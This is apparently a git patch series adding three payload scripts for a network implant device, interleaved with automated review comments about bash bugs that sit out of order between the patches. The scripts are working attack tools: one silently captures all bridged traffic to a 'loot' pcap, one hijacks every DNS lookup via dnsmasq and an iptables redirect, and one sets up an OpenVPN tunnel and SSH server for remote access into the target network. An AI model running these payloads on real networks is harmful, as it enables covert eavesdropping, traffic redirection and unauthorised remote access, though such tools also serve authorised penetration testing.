From 86639f17b7bb9b7ee28d43a0fee7e0dae51d66e1 Mon Sep 17 00:00:00 2001
From: cyrus104
Date: Thu, 9 Jul 2020 13:37:32 +0700
Subject: [PATCH 1/4] Added default payload with a few changes

Default payload updated to enable transparent mode on error.
---
 payloads/switch1/payload.sh | 68 +++++++++++++++++++++++++++++++------
 1 file changed, 57 insertions(+), 11 deletions(-)

diff --git a/payloads/switch1/payload.sh b/payloads/switch1/payload.sh
index 25da1c3..e333b0a 100755
--- a/payloads/switch1/payload.sh
+++ b/payloads/switch1/payload.sh
@@ -1,12 +1,58 @@
 #!/bin/bash
-#
-# Title: Default Payload
-# Description: Sets the NETMODE to NAT, then sets the LED to ATTACK
-# Author: Hak5
-# Version: 1.0
-# Category: default
-# Target: Any
-# Net Mode: NAT
-
-NETMODE NAT
-LED ATTACK
+# TCPDump payload v1.0
+
+function monitor_space() {
+ while true
+ do
+ [[ $(df | grep /mnt | awk '{print $4}') -lt 10000 ]] && {
+ kill $1
+ LED G SUCCESS
+ sync
+ break
+ }
+ sleep 5
+ done
+}
+
+function finish() {
+ # Kill TCPDump and sync filesystem
+ kill $1
+ wait $1
+ sync
+
+ # Indicate successful shutdown
+ LED R SUCCESS
+ sleep 1
+
+ # Halt the system
+ LED OFF
+ halt
+}
+
+function run() {
+ # Create loot directory
+ mkdir -p /mnt/loot/tcpdump &> /dev/null
+
+ # Set networking to TRANSPARENT mode and wait five seconds
+ NETMODE TRANSPARENT
+ sleep 5
+
+ # Start tcpdump on the bridge interface
+ tcpdump -i br-lan -w /mnt/loot/tcpdump/dump_$(date +%Y-%m-%d-%H%M%S).pcap &>/dev/null &
+ tpid=$!
+
+ # Wait for button to be pressed (disable button LED)
+ NO_LED=true BUTTON
+ finish $tpid
+}
+
+
+# This payload will only run if we have USB storage
+[[ ! -f /mnt/NO_MOUNT ]] && {
+ LED ATTACK
+ run &
+ monitor_space $! &
+} || {
+ LED FAIL
+ NETMODE TRASPARENT
+}

From 14da80aa0d43d616acd392bf4163adff24cfa51f Mon Sep 17 00:00:00 2001
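Review bot: `monitor_space $! &` in the bottom block receives the PID of the `run &` subshell, not of tcpdump, so `kill $1` inside monitor_space terminates a shell that is blocked on BUTTON while tcpdump keeps writing to the nearly full partition (as far as I can tell bash does not forward SIGTERM to its own background children). Because `tpid` only exists inside run(), the simplest fix is to start the monitor there: after `tpid=$!` add `monitor_space "$tpid" &` and drop the `monitor_space $! &` line from the bottom block. The free-space test `[[ $(df | grep /mnt | awk '{print $4}') -lt 10000 ]]` also treats an empty df result as 0 and would stop the capture within five seconds; read it into a variable first and guard with `[[ -n "$free" && "$free" -lt 10000 ]]`. The Title/Description/Author/Version/Category/Target/Net Mode header that the old file carried is dropped here and in the switch2 and switch3 payloads; keeping that block would preserve the metadata format the repository's default payloads use.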
From: cyrus104
Date: Thu, 9 Jul 2020 13:38:14 +0700
Subject: [PATCH 2/4] Uploaded Default Switch 2 Payload

---
 payloads/switch2/payload.sh | 39 ++++++++++++++++++++++++++-----------
 payloads/switch2/spoofhost | 1 +
 2 files changed, 29 insertions(+), 11 deletions(-)
 create mode 100644 payloads/switch2/spoofhost

diff --git a/payloads/switch2/payload.sh b/payloads/switch2/payload.sh
index 25da1c3..294bcbd 100755
--- a/payloads/switch2/payload.sh
+++ b/payloads/switch2/payload.sh
@@ -1,12 +1,29 @@
 #!/bin/bash
-#
-# Title: Default Payload
-# Description: Sets the NETMODE to NAT, then sets the LED to ATTACK
-# Author: Hak5
-# Version: 1.0
-# Category: default
-# Target: Any
-# Net Mode: NAT
-
-NETMODE NAT
-LED ATTACK
+# DNSSpoof payload
+
+
+function setup() {
+ # Show SETUP LED
+ LED SETUP
+
+ # Set the network mode to NAT
+ NETMODE NAT
+ sleep 5
+
+ # Copy the spoofhost file to /tmp/dnsmasq.address
+ cp $(dirname ${BASH_SOURCE[0]})/spoofhost /tmp/dnsmasq.address &> /dev/null
+
+ # Restart dnsmasq with the new configuration
+ /etc/init.d/dnsmasq restart
+}
+
+function run() {
+ # Show ATTACK LED
+ LED ATTACK
+
+ # Redirect all DNS traffic to ourselves
+ iptables -A PREROUTING -t nat -i eth0 -p udp --dport 53 -j REDIRECT --to-port 53
+}
+
+setup
+run
\ No newline at end of file
diff --git a/payloads/switch2/spoofhost b/payloads/switch2/spoofhost
new file mode 100644
index 0000000..6580081
--- /dev/null
+++ b/payloads/switch2/spoofhost
@@ -0,0 +1 @@
+address=/#/172.16.32.1
\ No newline at end of file

From 93dd64b29250d5370caff14ac63e3d88a33659b6 Mon Sep 17 00:00:00 2001
From: cyrus104
Date: Thu, 9 Jul 2020 13:40:49 +0700
Subject: [PATCH 3/4] Uploaded Default Switch 3 Payload

---
 payloads/switch3/config.ovpn | 1 +
 payloads/switch3/payload.sh | 62 +++++++++++++++++++++++++++++-------
 2 files changed, 52 insertions(+), 11 deletions(-)
 create mode 100644 payloads/switch3/config.ovpn
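Review bot: `cp $(dirname ${BASH_SOURCE[0]})/spoofhost /tmp/dnsmasq.address &> /dev/null` in setup() hides a failed copy, so if the file is missing or the payload path contains a space, dnsmasq is restarted with whatever /tmp/dnsmasq.address already held and the LED still goes on to ATTACK. Quote the expansion and let the failure stop the payload: `cp -- "$(dirname "${BASH_SOURCE[0]}")/spoofhost" /tmp/dnsmasq.address || { LED FAIL; exit 1; }`. The new payload.sh also ends without a trailing newline (`\ No newline at end of file`), which the other payload files in this series do not; adding one avoids a spurious diff on the next edit.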
diff --git a/payloads/switch3/config.ovpn b/payloads/switch3/config.ovpn
new file mode 100644
index 0000000..30360f9
--- /dev/null
+++ b/payloads/switch3/config.ovpn
@@ -0,0 +1 @@
+Replace with valid .ovpn config.
\ No newline at end of file
diff --git a/payloads/switch3/payload.sh b/payloads/switch3/payload.sh
index 25da1c3..913a92b 100755
--- a/payloads/switch3/payload.sh
+++ b/payloads/switch3/payload.sh
@@ -1,12 +1,52 @@
 #!/bin/bash
-#
-# Title: Default Payload
-# Description: Sets the NETMODE to NAT, then sets the LED to ATTACK
-# Author: Hak5
-# Version: 1.0
-# Category: default
-# Target: Any
-# Net Mode: NAT
-
-NETMODE NAT
-LED ATTACK
+# OpenVPN payload
+
+# Set to 1 to allow clients to use the VPN
+FOR_CLIENTS=0
+
+DNS_SERVER="8.8.8.8"
+
+# Cheap hack to set the DNS server
+function setdns() {
+ while true
+ do
+ [[ ! $(grep -q "$DNS_SERVER" /tmp/resolv.conf) ]] && {
+ echo -e "search lan\nnameserver $DNS_SERVER" > /tmp/resolv.conf
+ }
+ sleep 5
+ done
+}
+
+function start() {
+ LED SETUP
+
+ DIR=$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)
+
+ # Set NETMODE to BRIDGE and wait 3 seconds
+ # to ensure that things can settle
+
+ [[ "$FOR_CLIENTS" == "1" ]] && {
+ /usr/bin/NETMODE VPN
+ } || {
+ /usr/bin/NETMODE BRIDGE
+ }
+ sleep 3
+
+ # Make OpenVPN use the local configuration
+ uci set openvpn.vpn.config="${DIR}/config.ovpn"
+ uci commit
+
+ # Start the OpenVPN server in the background
+ /etc/init.d/openvpn start
+
+ # Start SSH Server
+ /etc/init.d/sshd start &
+
+ # Set DNS server
+ setdns &
+
+ LED ATTACK
+}
+
+# Start the payload
+start &

From 1ddc8980e1a003eff5f344173c1c77d1b9ed5d10 Mon Sep 17 00:00:00 2001
From: cyrus104
Date: Fri, 10 Jul 2020 15:01:56 +0700
Subject: [PATCH 4/4] corrected a typo

---
 payloads/switch1/payload.sh | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/payloads/switch1/payload.sh b/payloads/switch1/payload.sh
index e333b0a..40838f1 100755
--- a/payloads/switch1/payload.sh
+++ b/payloads/switch1/payload.sh
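Review bot: In setdns(), `[[ ! $(grep -q "$DNS_SERVER" /tmp/resolv.conf) ]]` can never be false: `grep -q` prints nothing, so the substitution is always empty and `[[ ! "" ]]` is always true, which means /tmp/resolv.conf is rewritten every five seconds whether or not it already names the server. Test the exit status instead, `if ! grep -q -- "$DNS_SERVER" /tmp/resolv.conf; then` … `fi`, and write the file with `printf 'search lan\nnameserver %s\n' "$DNS_SERVER"` rather than `echo -e`. In start(), `[[ "$FOR_CLIENTS" == "1" ]] && { … } || { … }` also runs `/usr/bin/NETMODE BRIDGE` whenever `NETMODE VPN` returns non-zero, so an `if`/`else` is the safer shape, and the comment above it says BRIDGE while the code may select VPN. `DIR` is assigned without `local`, leaking a global from a function that is run in the background.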
@@ -54,5 +54,5 @@ function run() {
 monitor_space $! &
 } || {
 LED FAIL
- NETMODE TRASPARENT
+ NETMODE TRANSPARENT
 }